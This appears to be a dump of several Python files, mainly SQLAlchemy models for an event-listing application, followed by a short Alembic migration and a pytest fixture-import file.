id = Column(Integer(), primary_key=True)
name = Column(Unicode(255), nullable=False)
url = deferred(Column(String(255)), group="detail")
email = deferred(Column(Unicode(255)), group="detail")
phone = deferred(Column(Unicode(255)), group="detail")
fax = deferred(Column(Unicode(255)), group="detail")
location_id = deferred(db.Column(db.Integer, db.ForeignKey("location.id")))
location = db.relationship(
"Location", uselist=False, single_parent=True, cascade="all, delete-orphan"
)
logo_id = deferred(db.Column(db.Integer, db.ForeignKey("image.id")))
logo = db.relationship(
"Image", uselist=False, single_parent=True, cascade="all, delete-orphan"
)
admin_unit_id = db.Column(db.Integer, db.ForeignKey("adminunit.id"), nullable=True)
@listens_for(EventOrganizer, "before_insert")
@listens_for(EventOrganizer, "before_update")
def purge_event_organizer(mapper, connect, self):
if self.logo and self.logo.is_empty():
self.logo_id = None
class EventReference(db.Model, TrackableMixin):
__tablename__ = "eventreference"
__table_args__ = (
UniqueConstraint(
"event_id", "admin_unit_id", name="eventreference_event_id_admin_unit_id"
),
)
id = Column(Integer(), primary_key=True)
event_id = db.Column(db.Integer, db.ForeignKey("event.id"), nullable=False)
admin_unit_id = db.Column(db.Integer, db.ForeignKey("adminunit.id"), nullable=False)
rating = Column(Integer(), default=50)
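# For all-day entries, normalise start/end to the very beginning and end of the day
# (falling back to the start date when no end is given).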
def sanitize_allday_instance(instance):
if instance.allday:
from project.dateutils import date_set_begin_of_day, date_set_end_of_day
instance.start = date_set_begin_of_day(instance.start)
if instance.end:
instance.end = date_set_end_of_day(instance.end)
else:
instance.end = date_set_end_of_day(instance.start)
class EventReferenceRequest(db.Model, TrackableMixin):
__tablename__ = "eventreferencerequest"
__table_args__ = (
UniqueConstraint(
"event_id",
"admin_unit_id",
name="eventreferencerequest_event_id_admin_unit_id",
),
)
id = Column(Integer(), primary_key=True)
event_id = db.Column(db.Integer, db.ForeignKey("event.id"), nullable=False)
admin_unit_id = db.Column(db.Integer, db.ForeignKey("adminunit.id"), nullable=False)
review_status = Column(IntegerEnum(EventReferenceRequestReviewStatus))
rejection_reason = Column(IntegerEnum(EventReferenceRequestRejectionReason))
@hybrid_property
def verified(self):
return self.review_status == EventReferenceRequestReviewStatus.verified
class EventMixin(object):
name = Column(Unicode(255), nullable=False)
external_link = Column(String(255))
description = Column(UnicodeText(), nullable=True)
ticket_link = Column(String(255))
tags = Column(UnicodeText())
kid_friendly = Column(Boolean())
accessible_for_free = Column(Boolean())
age_from = Column(Integer())
age_to = Column(Integer())
target_group_origin = Column(IntegerEnum(EventTargetGroupOrigin))
attendance_mode = Column(IntegerEnum(EventAttendanceMode))
registration_required = Column(Boolean())
booked_up = Column(Boolean())
expected_participants = Column(Integer())
price_info = Column(UnicodeText())
@declared_attr
def __ts_vector__(cls):
return create_tsvector((cls.name, "A"), (cls.tags, "B"), (cls.description, "C"))
@declared_attr
def photo_id(cls):
return Column("photo_id", ForeignKey("image.id"))
@declared_attr
def photo(cls):
return relationship(
"Image", uselist=False, single_parent=True, cascade="all, delete-orphan"
)
def purge_event_mixin(self):
if self.photo and self.photo.is_empty():
self.photo_id = None
class EventSuggestion(db.Model, TrackableMixin, EventMixin):
__tablename__ = "eventsuggestion"
__table_args__ = (
CheckConstraint(
"NOT(event_place_id IS NULL AND event_place_text IS NULL)",
),
CheckConstraint("NOT(organizer_id IS NULL AND organizer_text IS NULL)"),
)
id = Column(Integer(), primary_key=True)
start = db.Column(db.DateTime(timezone=True), nullable=False)
end = db.Column(db.DateTime(timezone=True), nullable=True)
allday = db.Column(
Boolean(),
nullable=False,
default=False,
server_default="0",
)
recurrence_rule = Column(UnicodeText())
review_status = Column(IntegerEnum(EventReviewStatus))
rejection_resaon = Column(IntegerEnum(EventRejectionReason))
contact_name = Column(Unicode(255), nullable=False)
contact_email = Column(Unicode(255))
contact_phone = Column(Unicode(255))
contact_email_notice = Column(Boolean())
admin_unit_id = db.Column(db.Integer, db.ForeignKey("adminunit.id"), nullable=False)
event_place_id = db.Column(
db.Integer, db.ForeignKey("eventplace.id"), nullable=True
)
event_place = db.relationship("EventPlace", uselist=False)
event_place_text = Column(Unicode(255), nullable=True)
organizer_id = db.Column(
db.Integer, db.ForeignKey("eventorganizer.id"), nullable=True
)
organizer = db.relationship("EventOrganizer", uselist=False)
organizer_text = Column(Unicode(255), nullable=True)
categories = relationship(
"EventCategory", secondary="eventsuggestion_eventcategories"
)
event_id = db.Column(
db.Integer, db.ForeignKey("event.id", ondelete="SET NULL"), nullable=True
)
event = db.relationship("Event", uselist=False)
@hybrid_property
def verified(self):
return self.review_status == EventReviewStatus.verified
@listens_for(EventSuggestion, "before_insert")
@listens_for(EventSuggestion, "before_update")
def purge_event_suggestion(mapper, connect, self):
if self.organizer_id is not None:
self.organizer_text = None
if self.event_place_id is not None:
self.event_place_text = None
self.purge_event_mixin()
sanitize_allday_instance(self)
class Event(db.Model, TrackableMixin, EventMixin):
__tablename__ = "event"
id = Column(Integer(), primary_key=True)
admin_unit_id = db.Column(db.Integer, db.ForeignKey("adminunit.id"), nullable=False)
organizer_id = db.Column(
db.Integer, db.ForeignKey("eventorganizer.id"), nullable=False
)
organizer = db.relationship("EventOrganizer", uselist=False)
event_place_id = db.Column(
db.Integer, db.ForeignKey("eventplace.id"), nullable=False
)
event_place = db.relationship("EventPlace", uselist=False)
categories = relationship("EventCategory", secondary="event_eventcategories")
co_organizers = relationship(
"EventOrganizer",
secondary="event_coorganizers",
backref=backref("co_organized_events", lazy=True),
)
event_lists = relationship(
"EventList",
secondary="event_eventlists",
backref=backref("events", lazy=True),
)
public_status = Column(
IntegerEnum(PublicStatus),
nullable=False,
default=PublicStatus.published.value,
server_default=str(PublicStatus.published.value),
)
status = Column(IntegerEnum(EventStatus))
previous_start_date = db.Column(db.DateTime(timezone=True), nullable=True)
rating = Column(Integer(), default=50)
@property
def min_start_definition(self):
if self.date_definitions:
return min(self.date_definitions, key=lambda d: d.start)
else:
return None
@hybrid_property
def min_start(self):
if self.date_definitions:
return min(d.start for d in self.date_definitions)
else:
return None
@min_start.expression
def min_start(cls):
return (
select([EventDateDefinition.start])
.where(EventDateDefinition.event_id == cls.id)
.order_by(EventDateDefinition.start)
.limit(1)
.as_scalar()
)
@hybrid_property
def is_recurring(self):
if self.date_definitions:
return any(d.recurrence_rule for d in self.date_definitions)
else:
return False
@is_recurring.expression
def is_recurring(cls):
return (
select([func.count()])
.select_from(EventDateDefinition.__table__)
.where(
and_(
EventDateDefinition.event_id == cls.id,
func.coalesce(EventDateDefinition.recurrence_rule, "") != "",
)
)
.as_scalar()
) > 0
date_definitions = relationship(
"EventDateDefinition",
order_by="EventDateDefinition.start",
backref=backref("event", lazy=False),
cascade="all, delete-orphan",
)
dates = relationship(
"EventDate", backref=backref("event", lazy=False), cascade="all, delete-orphan"
)
references = relationship(
"EventReference",
backref=backref("event", lazy=False),
cascade="all, delete-orphan",
)
reference_requests = relationship(
"EventReferenceRequest",
backref=backref("event", lazy=False),
cascade="all, delete-orphan",
)
@hybrid_property
def category(self):
if self.categories:
return self.categories[0]
else:
return None
@property
def co_organizer_ids(self):
return [c.id for c in self.co_organizers]
@co_organizer_ids.setter
def co_organizer_ids(self, value):
self.co_organizers = EventOrganizer.query.filter(
EventOrganizer.id.in_(value)
).all()
def validate(self):
if self.organizer and self.organizer.admin_unit_id != self.admin_unit_id:
raise make_check_violation("Invalid organizer.")
if self.co_organizers:
for co_organizer in self.co_organizers:
if (
co_organizer.admin_unit_id != self.admin_unit_id
or co_organizer.id == self.organizer_id
):
raise make_check_violation("Invalid co-organizer.")
if self.event_place and self.event_place.admin_unit_id != self.admin_unit_id:
raise make_check_violation("Invalid place.")
if not self.date_definitions or len(self.date_definitions) == 0:
            raise make_check_violation("At least one date definition is required.")
@listens_for(Event, "before_insert")
@listens_for(Event, "before_update")
def before_saving_event(mapper, connect, self):
self.validate()
self.purge_event_mixin()
class EventDate(db.Model):
__tablename__ = "eventdate"
id = Column(Integer(), primary_key=True)
event_id = db.Column(db.Integer, db.ForeignKey("event.id"), nullable=False)
start = db.Column(db.DateTime(timezone=True), nullable=False, index=True)
end = db.Column(db.DateTime(timezone=True), nullable=True, index=True)
allday = db.Column(
Boolean(),
nullable=False,
default=False,
server_default="0",
)
@listens_for(EventDate, "before_insert")
@listens_for(EventDate, "before_update")
def purge_event_date(mapper, connect, self):
sanitize_allday_instance(self)
class EventDateDefinition(db.Model):
__tablename__ = "eventdatedefinition"
id = Column(Integer(), primary_key=True)
event_id = db.Column(db.Integer, db.ForeignKey("event.id"), nullable=False)
start = db.Column(db.DateTime(timezone=True), nullable=False)
end = db.Column(db.DateTime(timezone=True), nullable=True)
allday = db.Column(
Boolean(),
nullable=False,
default=False,
server_default="0",
)
recurrence_rule = Column(UnicodeText())
def validate(self):
if self.start and self.end:
if self.start > self.end:
raise make_check_violation("The start must be before the end.")
max_end = self.start + relativedelta(days=14)
if self.end > max_end:
raise make_check_violation("An event can last a maximum of 14 days.")
@listens_for(EventDateDefinition, "before_insert")
@listens_for(EventDateDefinition, "before_update")
def before_saving_event_date_definition(mapper, connect, self):
self.validate()
sanitize_allday_instance(self)
class EventEventCategories(db.Model):
__tablename__ = "event_eventcategories"
__table_args__ = (UniqueConstraint("event_id", "category_id"),)
id = Column(Integer(), primary_key=True)
event_id = db.Column(db.Integer, db.ForeignKey("event.id"), nullable=False)
category_id = db.Column(
db.Integer, db.ForeignKey("eventcategory.id"), nullable=False
)
class EventSuggestionEventCategories(db.Model):
__tablename__ = "eventsuggestion_eventcategories"
__table_args__ = (UniqueConstraint("event_suggestion_id", "category_id"),)
id = Column(Integer(), primary_key=True)
event_suggestion_id = db.Column(
db.Integer, db.ForeignKey("eventsuggestion.id"), nullable=False
)
category_id = db.Column(
db.Integer, db.ForeignKey("eventcategory.id"), nullable=False
)
class EventCoOrganizers(db.Model):
__tablename__ = "event_coorganizers"
__table_args__ = (UniqueConstraint("event_id", "organizer_id"),)
id = Column(Integer(), primary_key=True)
event_id = db.Column(db.Integer, db.ForeignKey("event.id"), nullable=False)
organizer_id = db.Column(
db.Integer, db.ForeignKey("eventorganizer.id"), nullable=False
)
class EventList(db.Model, TrackableMixin):
__tablename__ = "eventlist"
__table_args__ = (
UniqueConstraint(
"name", "admin_unit_id", name="eventreference_name_admin_unit_id"
),
)
id = Column(Integer(), primary_key=True)
name = Column(Unicode(255))
admin_unit_id = db.Column(db.Integer, db.ForeignKey("adminunit.id"), nullable=False)
class EventEventLists(db.Model):
__tablename__ = "event_eventlists"
__table_args__ = (UniqueConstraint("event_id", "list_id"),)
id = Column(Integer(), primary_key=True)
event_id = db.Column(db.Integer, db.ForeignKey("event.id"), nullable=False)
list_id = db.Column(db.Integer, db.ForeignKey("eventlist.id"), nullable=False)
class Analytics(db.Model):
__tablename__ = "analytics"
id = Column(Integer(), primary_key=True)
key = Column(Unicode(255))
value1 = Column(Unicode(255))
value2 = Column(Unicode(255))
created_at = Column(DateTime, default=datetime.datetime.utcnow)
# Deprecated begin
class FeaturedEventReviewStatus(IntEnum):
inbox = 1
verified = 2
rejected = 3
class FeaturedEventRejectionReason(IntEnum):
duplicate = 1
untrustworthy = 2
illegal = 3
irrelevant = 4
# Deprecated end
|
py | 7dfaffd40ca12338a2844757b3a5032da2a4ac0d | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Add fixed_subnet column to baymodel table
Revision ID: e0653b2d5271
Revises: 68ce16dfd341
Create Date: 2016-06-29 14:14:37.862594
"""
# revision identifiers, used by Alembic.
revision = 'e0653b2d5271'
down_revision = '68ce16dfd341'
from alembic import op
import sqlalchemy as sa
def upgrade():
op.add_column('baymodel', sa.Column('fixed_subnet',
sa.String(length=255), nullable=True))
|
py | 7dfb002d3a24aa33e2b94a506a6660e547fe4227 | import pytest
from tests.fixtures.im_fixtures import (
im_rgb_np,
im_mch_np,
im_gry_np,
dask_im_rgb_np,
dask_im_gry_np,
dask_im_mch_np,
zarr_im_rgb_np,
zarr_im_gry_np,
zarr_im_mch_np,
mask_np,
disk_im_mch,
disk_im_rgb,
disk_im_gry,
disk_im_mch_notile,
disk_im_gry_pyr,
disk_im_mch_pyr,
disk_im_rgb_pyr,
)
from tests.fixtures.transform_fixtures import (
complex_transform,
complex_transform_larger,
simple_transform_affine,
simple_transform_affine_nl,
simple_transform_affine_large_output,
simple_transform_affine_nl_large_output,
)
|